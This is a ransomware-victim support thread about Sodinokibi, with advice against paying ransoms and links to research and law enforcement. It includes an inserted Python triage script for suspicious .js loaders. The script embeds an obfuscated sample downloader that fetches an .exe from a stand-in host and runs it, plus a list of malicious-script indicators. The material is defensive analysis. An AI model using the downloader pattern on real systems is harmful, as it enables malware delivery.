Jibz

Files encrypted with Sodinokibi probably


Hello,

I'm not sure how I got infected, but I think it was when I executed a .js file. I thought it was the file I wanted to download.

Is there a way to decrypt my files back?
I attached the JavaScript file in case it helps. Be careful: do not execute it like I did.
Thank you

17i56-readme.txt stupid_ransomware!!.js

6ca2e8b7.lock 17i56-readme.txt bleach_ichigo_sword_hollow_wave_weapons_94546_1920x1080.jpg.17i56

At the moment there are no free decrypters for Sodinokibi Ransomware.

This Ransomware is still being studied. There are several different variants.

I described its early version in April, but have not yet completed the information. It differs little from the first sample, except for new text on a blue background.

3 hours ago, Amigo-A said:

At the moment there are no free decrypters for Sodinokibi Ransomware.

This Ransomware is still being studied. There are several different variants.

I described its early version in April, but have not yet completed the information. It differs little from the first sample, except for new text on a blue background.

Hi,

Thanks for your reply.

Do you think it will take time to make a decryptor?

And was the JavaScript file the ransomware? If so, wouldn't it be easier to craft an antidote from its source?


The JS file in the attachment is malicious. I do not know its functionality; perhaps it is the loader.
Usually they are used to load or run the main file of the encoder.
Researchers have enough samples of the different variants. No one has reported a decryptor.

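The reply above describes the usual role of a .js attachment: a small loader that downloads and runs the actual encryptor. Such scripts can be triaged without executing them, which is the point the original poster was right to warn about. The script below is an added example, not code from the thread or from any analysis of the attached file (whose contents the thread does not show). SAMPLE_JS is a constructed stand-in shaped like a typical Windows Script Host downloader, with the three cheap obfuscation tricks that hide the tell-tale strings from a plain grep: String.fromCharCode arrays, array .join("") and literal concatenation. The indicator list and its weights are illustrative assumptions, not a published scoring scheme.

```python
"""Static triage of a suspicious .js attachment without running it.

Added example, not from the thread. SAMPLE_JS is a constructed stand-in shaped
like a typical Windows Script Host downloader; it is not the file the poster
attached. Indicator weights are illustrative assumptions.
"""
import re
from typing import Dict

INDICATORS = {
    r"ActiveXObject": 3,                 # COM instantiation from script
    r"WScript\.Shell": 3,                # process launch / environment access
    r"MSXML2\.XMLHTTP|XMLHTTP": 3,       # HTTP download
    r"ADODB\.Stream": 3,                 # write a binary response to disk
    r"Scripting\.FileSystemObject": 2,
    r"\.Run\(": 2,                       # execute the dropped file
    r"ShellExecute": 2,
    r"eval\(": 2,
    r"unescape\(": 1,
    r"\.exe\b|\.dll\b|\.scr\b": 1,
    r"%TEMP%|%APPDATA%": 1,
}

# Three cheap obfuscation tricks that hide the strings above from a grep.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
JOIN_RE = re.compile(r'\[\s*((?:"[^"\\]*"\s*,?\s*)+)\]\s*\.join\(\s*""\s*\)')
CONCAT_RE = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
STR_RE = re.compile(r'"([^"\\]*)"')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')

# Constructed sample; example.invalid is a reserved, non-resolving domain.
SAMPLE_JS = r'''
var s = ["WScr", "ipt.", "Shell"].join("");
var h = "MSX" + "ML2." + "XML" + "HTTP";
var url = String.fromCharCode(104,116,116,112,58,47,47) + "files.example.invalid" + "/pay" + "load.exe";
var x = new ActiveXObject(h);
x.open("GET", url, false);
x.send();
var sh = new ActiveXObject(s);
var p = sh.ExpandEnvironmentStrings("%TEMP%") + "\\svc.exe";
var ad = new ActiveXObject("ADODB.Stream");
ad.Type = 1; ad.Open(); ad.Write(x.responseBody); ad.SaveToFile(p, 2); ad.Close();
sh.Run(p, 0, false);
'''


def _charcode(m: "re.Match") -> str:
    codes = [int(c) for c in re.split(r"[\s,]+", m.group(1).strip()) if c]
    # A decoded quote or backslash would need escaping; not handled here.
    return '"' + "".join(chr(c) for c in codes) + '"'


def _join(m: "re.Match") -> str:
    return '"' + "".join(STR_RE.findall(m.group(1))) + '"'


def deobfuscate(js: str, max_rounds: int = 20) -> str:
    """Fold charcode arrays, array joins and literal concatenation to a fixpoint."""
    for _ in range(max_rounds):
        new = CHARCODE_RE.sub(_charcode, js)
        new = JOIN_RE.sub(_join, new)
        new = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', new)
        if new == js:
            break
        js = new
    return js


def triage(js: str) -> Dict:
    """Count obfuscation tricks in the raw text, then score the deobfuscated
    text against INDICATORS and pull out any URLs it contacts."""
    obfuscation = {
        "fromCharCode": len(CHARCODE_RE.findall(js)),
        "array_join": len(JOIN_RE.findall(js)),
        "string_concat": len(CONCAT_RE.findall(js)),
    }
    clean = deobfuscate(js)
    hits = [(pat, w) for pat, w in INDICATORS.items() if re.search(pat, clean)]
    return {
        "score": sum(w for _, w in hits),
        "hits": [pat for pat, _ in hits],
        "urls": sorted(set(URL_RE.findall(clean))),
        "obfuscation": obfuscation,
        "deobfuscated": clean,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_JS)
    print("score:", report["score"], "urls:", report["urls"])
    print(report["deobfuscated"])
```

On the constructed sample the raw text contains none of the indicator strings intact, yet after folding it scores 16 and yields the download URL; that URL, together with the hash of the .js file, is what an analyst would want submitted alongside the note. Read the file with a non-executing editor or this script only; never double-click it, and treat any resolved URL as hostile rather than visiting it.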
16 minutes ago, Amigo-A said:

The JS file in the attachment is malicious. I do not know its functionality; perhaps it is the loader.
Usually they are used to load or run the main file of the encoder.
Researchers have enough samples of the different variants. No one has reported a decryptor.

Ah I see. Let's hope the researchers craft a decryptor soon enough.

I was thinking maybe the researchers would want the JS file; that's why I put it there.
Thanks

3 hours ago, Jibz said:

I was thinking maybe the researchers would want the JS file; that's why I put it there.

I've forwarded the JS file to our analysts in case they want to take a look at it.

As for the lack of a decrypter, usually that simply means that a functioning decrypter isn't feasible: either the encryption is too difficult to crack, or it would take too long to do it on victims' computers for them to get their files back in a reasonable amount of time.

1 minute ago, GT500 said:

I've forwarded the JS file to our analysts in case they want to take a look at it.

As for the lack of a decrypter, usually that simply means that a functioning decrypter isn't feasible: either the encryption is too difficult to crack, or it would take too long to do it on victims' computers for them to get their files back in a reasonable amount of time.

By the way, I went to their website and could check whether their online decryptor works. And yes, it actually works; I could decrypt 3 of my files. Unfortunately I don't have $1500 to buy their decryptor. Of course it is not advised to do so either.

5 minutes ago, Jibz said:

Of course it is not advised to do so either.

Correct, it is generally recommended to avoid paying ransoms like this.

Even more so than that, never try to contact the criminals yourself. If you feel you have to contact them for any reason, then I recommend having a third party that is experienced in negotiating with criminals like this contact them for you. CoveWare is the only one I can remember off the top of my head; however, there are a few others as well that are honest enough to admit that this is what they do, and I believe they would also give you the odds of receiving a working decrypter from the criminals.


By the pace at which the malicious campaign spreading this Sodinokibi is developing, I see that they are not doing this for the first time.
Previously, researchers independently of each other noted kinship with another "sensational" ransomware. I will not give its name so as not to contribute to its popularity. [They have robbed people of several billion dollars and recently reported the closure of this ransomware project.] But the fact of the alleged relationship may indicate that the actors who stand behind it could have previously taken part in the dissemination of the extortioner which I do not name.

11 hours ago, Amigo-A said:

By the pace at which the malicious campaign spreading this Sodinokibi is developing, I see that they are not doing this for the first time.
Previously, researchers independently of each other noted kinship with another "sensational" ransomware. I will not give its name so as not to contribute to its popularity. [They have robbed people of several billion dollars and recently reported the closure of this ransomware project.] But the fact of the alleged relationship may indicate that the actors who stand behind it could have previously taken part in the dissemination of the extortioner which I do not name.

Are you talking about that ransomware where they made 2 billion or something and had to close it because they "earned" enough?
Do you think there will be public decrypter for Sodinokibi?

21 hours ago, GT500 said:

Correct, it is generally recommended to avoid paying ransoms like this.

Even more so than that, never try to contact the criminals yourself. If you feel you have to contact them for any reason, then I recommend having a third party that is experienced in negotiating with criminals like this contact them for you. CoveWare is the only one I can remember off the top of my head; however, there are a few others as well that are honest enough to admit that this is what they do, and I believe they would also give you the odds of receiving a working decrypter from the criminals.

Hey GT500. Is Sodinokibi under heavy research?
I shouldn't ask this, but do you know perhaps how long it would take to find a decrypter for Sodinokibi?

1 hour ago, Jibz said:

Are you talking about that ransomware where they made 2 billion or something and had to close it because they "earned" enough?

Yes. 😃

1 hour ago, Jibz said:

Do you think there will be public decrypter for Sodinokibi?

Not so fast, but quite possible in the future. 

5 minutes ago, Jibz said:

Hey GT500. Is Sodinokibi under heavy research?

It's already been fairly heavily researched by the Cisco Talos Intelligence Group:
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

By now, almost every ransomware researcher and analyst has certainly had time to take a good look at this ransomware as well.

 

7 minutes ago, Jibz said:

I shouldn't ask this, but do you know perhaps how long it would take to find a decrypter for Sodinokibi?

If one is released, then I expect it will take some time. As for how much time, I would only be able to speculate.

1 minute ago, Amigo-A said:

Not so fast, but quite possible in the future. 

You give me hope. I already saved my encrypted files, formatted my system drive, and am waiting for a decrypter.
Thank you.

1 minute ago, GT500 said:

It's already been fairly heavily researched by the Cisco Talos Intelligence Group:
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

By now, almost every ransomware researcher and analyst has certainly had time to take a good look at this ransomware as well.

 

If one is released, then I expect it will take some time. As for how much time, I would only be able to speculate.

What is your speculation?

Just now, Jibz said:

What is your speculation?

Depending on how the decrypter would need to be made, it could take anywhere from a few weeks to a couple of years. There's really no way to know for certain until a decrypter is ready for release.

2 minutes ago, GT500 said:

Depending on how the decrypter would need to be made, it could take anywhere from a few weeks to a couple of years. There's really no way to know for certain until a decrypter is ready for release.

Let's hope for a few weeks! A couple of years is just too much :D

Just now, Amigo-A said:

Sodinokibi has already existed for one and a half months.

Yeah I saw it.
By the way, those hackers have hearts of stone. I tried to negotiate a free decryptor, but nope, nope, it won't happen, they say.

10 minutes ago, Jibz said:

By the way, those hackers have hearts of stone. I tried to negotiate a free decryptor, but nope, nope, it won't happen, they say.

We recommend never contacting the criminals yourself. Always have a third party with experience negotiating with criminals contact them for you. There are a number of companies that are upfront about the fact that they do this; however, the only one whose name I can remember off the top of my head is CoveWare.

It's also not a bad idea to inform law enforcement about a security breach and/or a ransomware incident. They can at least investigate the criminals, and see if they can locate them. Here's a link to a list of law enforcement agencies by country, with links to their contact information:
https://www.nomoreransom.org/en/report-a-crime.html
